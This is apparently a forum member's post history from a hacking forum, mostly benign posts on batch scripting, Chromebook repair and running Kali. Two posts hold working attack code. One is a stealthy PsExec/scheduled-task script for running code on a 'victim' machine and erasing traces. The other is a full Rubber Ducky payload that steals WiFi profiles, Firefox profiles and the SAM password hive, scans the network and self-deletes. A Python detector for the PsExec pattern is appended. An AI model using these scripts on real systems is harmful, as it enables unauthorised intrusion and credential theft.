0phoi5

Dedicated Members
  • Posts: 702
  • Joined
  • Last visited
  • Days Won: 20

Everything posted by 0phoi5

  1. I feel like I have much to learn. I'm currently at the level of batch programs. Any tips on what to move on to next? I was thinking PowerShell and then Ruby?
  2. I hope not! People will start thinking it's rubbish and be put off, when it's actually pretty amazing, with the right equipment!
  3. Hi all, I'm using... wmic /node:%Hostname% os get lastbootuptime ... which gives the output as a WMIDateTime (Last time a PC was rebooted)... 20160104102930 Is there a way for me to convert this output to a nicely formatted date/time from within the batch file? In this case, I'd like the output to be something like 04/01/2016 10:29 I've had a look around the net, but couldn't find what I needed. Surely batch can do this, without having to rely on JavaScript/PowerShell? Thank you.
  4. If you don't specify a username, the system would run FOO.bat as SYSTEM, which wouldn't give you much access to do anything. If you just put %USERNAME%, without specifying its value in the script, it would attempt to pull your username from your PC, which likely would mean FOO.bat wouldn't run. *Edit* Note - It is only for the command... psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%" ... that you need to specify the %Username%. In the FOO.bat itself, you could put %Username% as undefined, as the batch file would be running as the target user anyway.
  5. You can use Chroot nicely on it, for loading Linux. Works well and is quick and easy to set up; I use Kali on it - https://github.com/dnschneid/crouton/wiki/Kali Not as good as using a proper laptop, but it can be convenient sometimes. Essentially, yes, this is the equivalent of taking the battery out of your phone and putting it back, except you have to boot the Chromebook without the battery in it, to get it to error due to not finding the battery, then put it back.
  6. Following on from what cooper states, I feel the same way. From experience, I've worked with simple programs in BASIC at work, that people who are supposed to know what they are doing have created, and they are a real dog's dinner. I think people get annoyed with BASIC because they spend more time fixing others' mistakes / horrible code than actually getting to make new and nice things with it. I feel other languages 'force' the user into using slightly better practices, so if someone else picks it up, they can at least break it down rather than looking at a wall of text that some nutter threw together. *Edit* Spelling mistakes, again.
  7. I should probably have a play, then! Haven't run any password hashes since getting the 960, sounds around 30x faster than my last card. I'd love a Titan, but spending £1k on a card would probably make me weep.
  8. Me and my work colleagues were just on about this. Nice move! It's a shame I didn't put in, however I'm pretty sure I'll be buying one today anyway, if they don't sell out right away! Only 40 minutes to go now!
  9. Damn, I have the same card, didn't realise it performed at that level. You using Hashcat?
  10. Using PSTools can do this stealthily. You need to be connected to the same network. It shows a CMD window for a millisecond, barely noticeable. Most people would think nothing of it. You DON'T need the user's password for this, just their username. Script also covers its tracks and automatically runs in 80 seconds' time. I cannot guarantee 100% this works in Windows 10. Tested in Windows 7 and 8. Can't remember if I got this to work when running the schtask as SYSTEM, give it a try. Anything in [ ] needs amending. XCOPY C:\FOO.bat \\[IP]\c$ /E /S /C /Y set hh=%time:~0,2% if "%hh:~,1%"=="0" set hh=%hh:~1,2% set mm=%time:~3,2% if "%mm:~,1%"=="0" set mm=%mm:~1,2% set /A mm=%mm%+2 if %mm% GEQ 60 set /A mm=%mm%-60 && set /A hh=%hh%+1 if %hh% GEQ 24 set hh=00 if %mm% LSS 10 set mm=%mm% if %hh% LSS 10 set hh=0%hh:~1,1% set hhmm=%hh%:%mm% echo %hhmm% psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%" Timeout 80 psexec \\[IP] -s -c -f cmd.exe /c "del C:\FOO.bat" psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /Delete /TN [TASK NAME]" *Edit* I see you are trying this over the net. Apologies, maybe the above isn't quite what you want. However, you could try and amend this code and try to get it to work over the net (technically, I would say it was possible), or keep in mind that you could always travel to the location of your victim system. You'd just have to be close enough to crack their WiFi.
  11. Ah, apologies! Fair enough. That'll give us all plenty of time to prepare
  12. Interesting, if a little short, article on HackerNews today; http://thehackernews.com/2016/01/long-range-wifi-network.html Technically, this could make WiFi pentesting a teenie bit easier. Could certainly pick up/send a signal from further away, with less equipment, based on the longer waves. Thoughts?
  13. Just adding this to the folds of the internet, should someone else have the same issue. I took my new-ish Chromebook out the other day and it wouldn't turn on. The orange battery LED stayed solid orange, not flashing. Thinking the battery had died, I plugged it in and it successfully loaded up. I left it for an hour and looked at the charge. It hadn't moved from 1%. Unplugging the laptop from the power supply made it turn off. It got no power from the battery. The fix was simple, but took me a short while to find on the net, hence this post. Written in layman's terms, should someone non-techie find this post. Unplug the laptop. Turn it over and remove all of the small screws. Keep them safe. Gently 'pop' the edges of the laptop's cover open. They have tiny clips around the outside. As you remove the cover, do it slowly. There is a cable between the power supply (not the battery) and the motherboard that is quite short, you could damage it if you pull the cover off with gusto. You will need to leave this plugged in to follow a step below, so leave it connected. Locate the small connecting wire between the battery and the motherboard. It's located between 6 and 7 on this image. Unplug this connection. It's small and delicate, so be gentle. Treat her like a lady. Contrary to what you may have been told before, plug the power supply back in to the laptop and turn the power on. Leave the laptop itself turned off, just supply it some power. Don't touch anything inside the laptop and don't electrocute yourself, please. This step is to get the laptop to pick up the fact that the battery has been disconnected. Wait around 30 seconds. The LED for the battery indicator should change to red. The Chromebook is stating that it can't find the battery. Turn the power back off again. Plug the battery connection back in to the motherboard, the one that was pictured above. Put the cover back on, gently clipping it back in to place.
Plug the laptop back in once more and turn it on. Boot it up. Hopefully, it should now be charging, as it's picked the battery back up again. If so, put your little screws back in and off you go. Enjoy! *edit* Amended spelling.
  14. It's probably recommended to learn how to hack your own OS, based on the facts that; a.) You can better understand how to protect yourself from getting hacked b.) You can use Kali's tools to better understand how your attacks show up against a target system c.) You could potentially retaliate against someone who tries to attack you, as they are most likely using Kali or similar
  15. I'm not sure if this is the kind of information you are looking for, but you may wish to glance at / read ; http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-virtual-hacking-lab-0157333/ Personally, I prefer to pentest actual devices, rather than virtual ones. But then, as you said, it's the cost that's the issue! Get hardware where you can afford it, though, as nothing beats the real thing.
  16. Fair enough. I guess it just comes down to taste, then
  17. Arch is OK, the issue is that it's optimized for the i686 and x86-64 architectures, which the Chromebook doesn't have. It uses a Tegra K1. Kali also better supports pentesting tools across a wider field. *Edit* You can also run Kali on anything. I have it on my phone as well.
  18. DELAY 1200 GUI r DELAY 1200 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1200 ALT y DELAY 1200 ENTER ALT SPACE DELAY 1200 STRING m DELAY 1200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = 
(Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System 
Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report +"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $u = 0 ENTER STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace) ENTER STRING $Report = $Report + '<div id=right><h3>USB Devices</h3><table>' ENTER STRING do { ENTER STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) ENTER STRING $Report = $Report + "<tr><td>Drive Name: </td><td> + " $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>STRING Write-Output $fullUSB" ENTER STRING $u ++ ENTER 
STRING } while ($u -lt $allUsb.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>' ENTER STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> ' ENTER STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' ENTER STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>Network Information</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1 ENTER STRING $IPAddr = $IP.IPAddress | Select-Object -Index 0 ENTER STRING $IPAddr -as [String] ENTER STRING $IPa = $IPAddr.Split('.') | Select -Index 0 ENTER STRING $IPb = $IPAddr.Split('.') | Select -Index 1 ENTER STRING $IPc = $IPAddr.Split('.') | Select -Index 2 ENTER STRING $IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.' 
ENTER STRING $Ping = new-object System.Net.Networkinformation.Ping ENTER STRING $ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address ENTER STRING $x = 0 ENTER STRING $Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>' ENTER STRING do { ENTER STRING $IPResults = $ScanResults | Select-Object -Index $x ENTER STRING $CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory ENTER STRING $CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname ENTER STRING $CurrIP = $IPResults.Address.IPAddressToString ENTER STRING $CurrOS = $CompInfo.SystemDirectory ENTER STRING $CurrName = $CompInfo.RegisteredUser ENTER STRING if ($CompInfo -ne $null){ ENTER STRING $Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>' ENTER STRING }else{ ENTER STRING $Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'} ENTER STRING $x ++ ENTER STRING } while ($x -lt $ScanResults.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Computer = $env:COMPUTERNAME ENTER STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080 ENTER STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>' ENTER STRING foreach ($PortNumber in $PortList) { ENTER STRING $PortCheck = New-Object Net.Sockets.TcpClient ENTER STRING $PortCheck.Connect($Computer, $PortNumber) ENTER STRING if ($PortCheck.Connected) { ENTER STRING $Report = $Report + '<tr><td><b><font 
color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'} ENTER STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}} ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory ENTER STRING $srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces' ENTER STRING Copy-Item $srcDir $wlanSaveDir -Recurse ENTER STRING $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory ENTER STRING $fireDir = $userDir + '\AppData\Roaming\Mozilla\Firefox\Profiles' ENTER STRING $getFire = Get-Item -Path $fireDir -Exclude extensions ENTER STRING Copy-Item $getFire $fireSaveDir -Recurse ENTER STRING Start-Sleep -s 10 ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER 
STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1200 STRING C:\Windows\config-d6899.ps1 ENTER DELAY 1200 ALT F4 DELAY 1200 GUI r DELAY 1200 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1200 ALT y DELAY 1200 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1200 STRING m DELAY 1200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1200 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  19. Hi all, So I placed the following script on my Rubber Ducky, as inject.bin (next post). I used the Payload Generator located here. I chose all Recon apart from Screen Capture, and Reporting as 'Save Files to USB' Drive. I plugged it in to a Windows 7 machine, with the machine being on the Desktop and not locked. It proceeded to do nothing for a while, then it opened a random image file I happened to have on my Desktop and zoomed in and out on it a few times. Then silence. I plugged in my USB, named 'HELLOWORLD', gave it a few minutes and then unplugged. The USB had nothing on it, which wasn't right. It failed to gather any information at all. Is there a way I can debug the script? As in, get it to tell me exactly what it's doing, as it does it, on-screen? Or maybe you have an idea of what went wrong? *NOTE* This bit at the start... STRING powershell Start-Process notepad -Verb runAs ... didn't open notepad. Notepad failed to open at any point. Cheers.
  20. As a follow on to my last post, I found this; https://www.maketecheasier.com/map-crouton-installation-external-device-chromebook/ This describes a method to set up your Crouton installation to reside directly on an external device. Nice!
  21. After many different approaches and attempts since my original post; I found the best way is to CHROOT in to Kali SANA using my Acer Chromebook 13. Download Crouton. Open shell using CTRL+ALT+T and typing shell. Use... sudo sh -e ~/Downloads/crouton -r sana -t xfce (amend as required) ... to install. You can use... sh ~/Downloads/crouton -r list ... to check the list of Linux distros available, sana was the one I went with as it was the latest available at the time I originally installed, there may be a later version now. Once installed, use... sudo startxfce4 ... to load Kali. If you have space left, install all of Kali with... sudo apt-get install kali-linux-full (probably not a good idea on a Chromebook, not much space on the SSD. I only install the programs I need). It's really that simple. Took me a while to find it though. You might be able to use a different Kali version name in place of 'sana', I didn't bother checking that out too much as sana is great anyway. The only thing I couldn't get working within the chrooted Kali was Tor. Doesn't seem to load no matter what I try. Everything else works great. *edit* I unfortunately never did get Kali to boot on a Chromebook from a USB. Not the Chromebook 13, anyway. As cooper stated, it's down to the chip. The later Chromebooks with the Intel chip will boot USB Kali with no problems, but the Acer Chromebook doesn't seem to like it. If you do get it working, please let me know how! The above is a nice workaround though, as chances are you won't be using multiple Chromebooks you need a persistent Kali between. I assume.
  22. I found this nice article on Null Byte as well; http://null-byte.wonderhowto.com/how-to/cover-your-tracks-after-hacking-wifi-0165952/
  23. I can confirm barry's info as spot on. I personally have tried both and the USB 3.0 extension is the way to go. If you can't be bothered to make your own waterproof casing, use a plastic 'hobby box' you can get from any hardware store.
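
A defender's view of the PsExec and Schtasks sequence in post 10, as an added example that is not part of the original posts: it correlates a PSEXESVC service install with a scheduled task that is created and then deleted shortly afterwards on the same host. The event records are constructed samples reduced to hypothetical fields (`time`, `host`, `id`, `name`), and both time thresholds are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), reduced to four hypothetical
# fields. 7045 = service installed (System log); 4698 / 4699 = scheduled
# task created / deleted (Security log, requires the
# "Audit Other Object Access Events" subcategory).
SAMPLE_EVENTS = [
    {"time": "2016-01-12T10:29:01", "host": "WS-017", "id": 7045, "name": "PSEXESVC"},
    {"time": "2016-01-12T10:29:03", "host": "WS-017", "id": 4698, "name": "\\Updater"},
    {"time": "2016-01-12T10:30:25", "host": "WS-017", "id": 7045, "name": "PSEXESVC"},
    {"time": "2016-01-12T10:30:27", "host": "WS-017", "id": 4699, "name": "\\Updater"},
    # Benign: long-lived task, no remote service install around it.
    {"time": "2016-01-12T09:00:00", "host": "WS-020", "id": 4698, "name": "\\Backup"},
    {"time": "2016-01-12T18:00:00", "host": "WS-020", "id": 4699, "name": "\\Backup"},
    # PsExec used for admin work, no scheduled task activity.
    {"time": "2016-01-12T11:00:00", "host": "WS-031", "id": 7045, "name": "PSEXESVC"},
]

PSEXEC_SERVICE = "PSEXESVC"  # default service name PsExec installs on the target


def find_short_lived_remote_tasks(events,
                                  max_lifetime=timedelta(minutes=5),
                                  window=timedelta(seconds=30)):
    """Return tasks created and deleted within max_lifetime where both the
    creation and the deletion follow a PSEXESVC install on the same host by
    at most `window`. Both thresholds are assumptions to tune per site."""
    parsed = sorted(
        ({**e, "time": datetime.fromisoformat(e["time"])} for e in events),
        key=lambda e: e["time"],
    )
    installs = {}   # host -> [PSEXESVC install times]
    created = {}    # (host, task name) -> creation time
    findings = []

    def after_install(host, when):
        return any(timedelta(0) <= when - t <= window
                   for t in installs.get(host, []))

    for e in parsed:
        host = e["host"]
        if e["id"] == 7045 and e["name"].upper() == PSEXEC_SERVICE:
            installs.setdefault(host, []).append(e["time"])
        elif e["id"] == 4698:
            created[(host, e["name"])] = e["time"]
        elif e["id"] == 4699:
            start = created.pop((host, e["name"]), None)
            if start is None:
                continue  # task was created before the log window began
            lifetime = e["time"] - start
            if (lifetime <= max_lifetime
                    and after_install(host, start)
                    and after_install(host, e["time"])):
                findings.append({
                    "host": host,
                    "task": e["name"],
                    "lifetime_seconds": int(lifetime.total_seconds()),
                })
    return findings


if __name__ == "__main__":
    for finding in find_short_lived_remote_tasks(SAMPLE_EVENTS):
        print(finding)
```
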